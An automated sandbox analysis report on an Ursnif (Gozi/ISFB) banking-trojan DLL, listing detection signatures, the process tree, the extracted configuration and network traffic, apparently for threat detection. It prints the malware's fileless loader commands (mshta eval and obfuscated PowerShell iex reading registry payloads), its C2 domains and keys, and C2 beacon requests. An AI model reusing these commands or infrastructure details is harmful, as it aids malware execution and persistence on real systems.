
Windows Analysis Report 6.png

Overview

General Information

Sample Name: 6.png (renamed file extension from png to dll)
Analysis ID: 539457
MD5: ac57d694b86d8532b38d3d62f6de3afc
SHA1: c858ec742ba91bf8c139b7bb654ca2d67747c5ef
SHA256: fa668d1a58b3b92d9c1b9a740facfaebb35dd723deaf5a3833592208a8a47e5e
Tags: dll, exe, geofenced, Gozi, isfb, ITA, ursnif

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Maps a DLL or memory area into another process
Writes to foreign memory regions
PE file has a writeable .text section
Writes or reads registry keys via WMI
Machine Learning detection for sample
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Call by Ordinal
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Sigma detected: Suspicious Csc.exe Source File Folder
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Registers a DLL
PE / OLE file has an invalid certificate
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6360 cmdline: loaddll32.exe "C:\Users\user\Desktop\6.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 6376 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6400 cmdline: rundll32.exe "C:\Users\user\Desktop\6.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 4904 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • rundll32.exe (PID: 3492 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
    • regsvr32.exe (PID: 6388 cmdline: regsvr32.exe /s C:\Users\user\Desktop\6.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • control.exe (PID: 4912 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • rundll32.exe (PID: 6424 cmdline: rundll32.exe C:\Users\user\Desktop\6.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • control.exe (PID: 6580 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • BackgroundTransferHost.exe (PID: 5876 cmdline: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1 MD5: 02BA81746B929ECC9DB6665589B68335)
  • mshta.exe (PID: 4036 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 7132 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 5760 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6152 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES148E.tmp" "c:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • mshta.exe (PID: 1488 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ygup='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ygup).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 7012 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 7048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6552 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 3620 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES451.tmp" "c:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 3520 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
  • mshta.exe (PID: 3696 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Me2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Me2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 7160 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6188 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6796 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BF.tmp" "c:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • mshta.exe (PID: 496 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cf1r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cf1r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 3532 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 4196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6248 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6540 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B16.tmp" "c:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "B+xl4hUTn5rXiL0afazu2ddSc/ECZk5wqODKe0fS2KdIXHYzLOi+LPPP1HVzyCQFE2ZPog7imXfWyeJPGgVZO8mmh7g0OCbF0hBgHX6wj0qY1fBDcQxYjLnhuuJTPFt0voqEKHGGIgbiz86prZpdJls6h0dECkyqCOUP77xD4bHwJFYwmMp7govarzlBsbdorQ4qNFnd4O2rK1GEuQisAwdMkb4j9MqHf7vkHewrh1BGBeNcr85NjoxXAnfZDuX+M7b1dWoszYHJF1rgWzk4yz7fc+7Q4leAIr2PkWbTRuRpOe4P6Ok01hKGTLORQhRgWw6Mv2aRFMimHgiQWhhaHetICEhMcBl5C0yxhZCOhu4=", "c2_domain": ["microsoft.com/windowsdisabler", "windows.update3.com", "berukoneru.website", "gerukoneru.website", "fortunarah.com"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
(27 entries in total; only the first five are shown here)

Sigma Overview

System Summary:

Sigma detected: MSHTA Spawning Windows Shell
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4036, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ProcessId: 7132
Sigma detected: Suspicious Call by Ordinal
Source: Process started | Author: Florian Roth | Data: Command: rundll32.exe "C:\Users\user\Desktop\6.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\6.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6376, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\6.dll",#1, ProcessId: 6400
Sigma detected: Mshta Spawning Windows Shell
Source: Process started | Author: Florian Roth | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4036, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ProcessId: 7132
Sigma detected: Suspicious Csc.exe Source File Folder
Source: Process started | Author: Florian Roth | Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7012, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline, ProcessId: 6552
Sigma detected: Suspicious Rundll32 Activity
Source: Process started | Author: juju4, Jonhnathan Ribeiro, oscd.community | Data: Command: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 4904, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, ProcessId: 3492
Sigma detected: Non Interactive PowerShell
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4036, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ProcessId: 7132
Sigma detected: T1086 PowerShell Execution
Source: Pipe created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: PipeName: \PSHost.132839804557459233.7132.DefaultAppDomain.powershell

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000004.00000002.913785412.0000000000D60000.00000040.00000001.sdmp | Malware Configuration Extractor: Ursnif {"RSA Public Key": "B+xl4hUTn5rXiL0afazu2ddSc/ECZk5wqODKe0fS2KdIXHYzLOi+LPPP1HVzyCQFE2ZPog7imXfWyeJPGgVZO8mmh7g0OCbF0hBgHX6wj0qY1fBDcQxYjLnhuuJTPFt0voqEKHGGIgbiz86prZpdJls6h0dECkyqCOUP77xD4bHwJFYwmMp7govarzlBsbdorQ4qNFnd4O2rK1GEuQisAwdMkb4j9MqHf7vkHewrh1BGBeNcr85NjoxXAnfZDuX+M7b1dWoszYHJF1rgWzk4yz7fc+7Q4leAIr2PkWbTRuRpOe4P6Ok01hKGTLORQhRgWw6Mv2aRFMimHgiQWhhaHetICEhMcBl5C0yxhZCOhu4=", "c2_domain": ["microsoft.com/windowsdisabler", "windows.update3.com", "berukoneru.website", "gerukoneru.website", "fortunarah.com"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}
Machine Learning detection for sample
Source: 6.dll | Joe Sandbox ML: detected
Source: 6.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49795 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49796 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49797 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49798 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49799 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49801 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49802 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49803 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49805 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49806 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49807 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49808 version: TLS 1.2
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.452232416.0000000004AA0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.431445543.0000000006530000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.427791226.0000000005CD0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.437889471.0000000006160000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.452232416.0000000004AA0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.431445543.0000000006530000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.427791226.0000000005CD0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.437889471.0000000006160000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.pdb561934e089 source: powershell.exe, 00000019.00000003.455310412.00000254DC7BD000.00000004.00000001.sdmp

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: berukoneru.website
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 79.110.52.144 187
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: windows.update3.com
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 18.219.227.107 187
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 3.12.124.139 187
Source: Joe Sandbox View | ASN Name: V4ESCROW-ASRO V4ESCROW-ASRO
Source: Joe Sandbox View | JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: global traffic | HTTP traffic detected: GET /tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9onw/Df8mv9bGmzrCq_2BDh/Avhzr_2BW/zhUOFRSj_2Brp9dFi25e/XIimtsTVgbS8Ddk4Jlg/q7ifDAWTLXmxh8fPSAYnUc/3K8xDlQvgKVYD/9E1TEXJC/aPKjFJSRgVkfUwKBYWKDgLh/VONwiC9wK5/3CPG7RAhZST/_2FDfWf.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
Source: global traffic | HTTP traffic detected: GET /tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHYA4xvaox/Zos6wfhvU6Vx/dZ_2FhTkVUm/dQ1eWiBdVQx_2F/3MQ4AfN6CRhAz7ojdkAuB/vyHN6D_2BnDaccRD/rxLm6HRGflkJaqH/HtsgyaJ8NMuefJHJTr/vf407nMOm/3YNEpWUoxMPlA61ciEA5/ZB4w8oLbC0y/cC.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
Source: global traffic | HTTP traffic detected: GET /tire/fGFKjH5BjbdZz4tmUO5m/ZAUfPXxElw8Dkm9Cfh9/xqmrK6ieQrOr54I1y1Md2B/CJZjvCZRXK_2B/c6YLK40A/ibGCXB5z8qRJaf9iUFEBazW/9sEXIVndb3/DsRsV2z8TCrjx7mBI/rTZxp021lQBU/ESMggS1gJ_2/Bi3Bcj9_2B8Xf4/Xr9j2PgVhY9_2FzIeDatB/WE3DM_2B4ZBLmr9g/bExshi993/JbJC0wJJ/U.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
Source: global traffic | HTTP traffic detected: GET /tire/cFJsSWAGWE/z2qui_2Bz1BNPPVC8/40cjfJwuY_2F/qeMRrcIZBVG/Ne0YpnkwEJfIh3/f5okxbrq_2FXxzqJmpSlY/lBFuBWEAi70a61Vy/5QzGUBrPY97n5jQ/Uty84umyFnIA829ewc/61TtijfTY/zF0ZOoxI3N5pWHzggULR/QMXY_2F7FMDggc4thO7/G_2BQV4WNp08p5XmI0/TT.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
Source: global traffic | HTTP traffic detected: GET /tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/659nN8frXqL/KI_2BmGQcF3l8a/UPJEdWRElF2Ck7h3GrI7f/Jn4UaIHKOCKly3pR/5WtUgfhtCob3WA8/8RFl0SkPd8NK0tapfV/Bv03ARxcw/T6wxTs3S_2BFMRgrZw2Q/_2BV_2F7vXjmj/i.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
Source: global traffic | HTTP traffic detected: GET /tire/9IgUYNG9/P9N8jGg62VAhbwmUeolHFCg/K1HN9iUPdi/an2HdiNP_2FRIROSF/l9uR7XFSquKc/cTL90RaThvy/4LigE_2BC67Pa2/OL_2Fq6LzSFfAjBrcF1my/5AUpi_2BYfx15AAS/Ho8688ZDo7zPK6r/e_2F4ZPz87sJSle6kT/I1gJ4hikp/cCibgdVeBM9n2ccXEO18/D4MJBqmD.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
Source: global traffic | HTTP traffic detected: GET /tire/iH0556GjtiGQk4lyd6/e4eJ66Hyx/L2n2id7yGxzkaZSAZenq/25xy0D1xFkintWrbCAo/f_2Bdm0MJPWq7ugWEYUqSU/PtgL_2FeeZv0h/UCRQYI_2/FefNYP32vk23pbK3jV8vqXP/0Ovr3EWUID/eiKH_2Fkr5cf0tXqX/_2BscW0pxtbY/lmzrmCcsUPq/Hp_2BA_2BliXkb/fgGnQnQH8/_2B.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
